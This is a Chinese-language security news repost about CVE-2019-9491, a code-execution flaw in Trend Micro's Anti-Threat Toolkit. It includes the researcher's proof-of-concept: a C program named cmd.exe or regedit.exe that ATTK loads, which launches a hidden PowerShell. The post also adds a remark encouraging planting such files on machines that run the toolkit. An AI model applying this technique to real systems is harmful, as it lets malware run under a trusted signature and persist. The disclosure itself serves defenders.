1. 威客安全首页
  2. 安全资讯

趋势科技威胁工具包存在任意代码执行漏洞,漏洞成因略无语

点击蓝字

关注黑鸟

研究人员发现趋势科技防威胁工具包(ATTK)存在任意代码执行漏洞CVE-2019-9491,攻击者可利用此漏洞在目标Windows系统上运行恶意软件。






由于ATTK是由经过验证的发行方签名的,因此可绕过任何MOTW安全警告,攻击者甚至可以将ATTK作为一种持久性机制。


[Exploit/POC]
Compile an .EXE using below “C” code and use naming convention of “cmd.exe” or “regedit.exe”.
Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.

将恶意软件命名为cmd.exe或regedit.exe,ATTK将会加载并运行该文件


#include <windows.h>

void main(void){
   puts(“Trend Micro Anti-Threat Toolkit PWNED!”);
   puts(“Discovery: hyp3rlinx”);
   puts(“CVE-2019-9491n”);
   WinExec(“powershell”, 0);
}

演示视频


POC下载

http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt


而旧版本应该还可用,以及将cmd.exe或regedit.exe为命名的恶意软件投放到目标设备,也许都收获一份惊喜。(前提是知道目标有装)



顺便推荐一下这哥们的博客,全是他发现的0day漏洞,学习学习。

趋势科技威胁工具包存在任意代码执行漏洞,漏洞成因略无语


链接:

http://hyp3rlinx.altervista.org/



attk_collector_cli_x64.exe
Hash: e8503e9897fd56eac0ce3c3f6db24fb1

TrendMicroRansomwareCollector64.r09.exe
Hash: 798039027bb4363dcfd264c14267375f

attk_ScanCleanOnline_gui_x64.exe
Hash: f1d2ca4b14368911c767873cdbc194ed

点个赞,每日一个威胁情报故事

趋势科技威胁工具包存在任意代码执行漏洞,漏洞成因略无语

原文始发于微信公众号(黑鸟):趋势科技威胁工具包存在任意代码执行漏洞,漏洞成因略无语

本文转为转载文章,本文观点不代表威客安全立场。

发表评论

登录后才能评论

联系我们

4006-119-120

在线咨询:点击这里给我发消息

邮件:public@jinlongsec.com

工作时间:周一至周五,9:30-18:30,节假日休息

X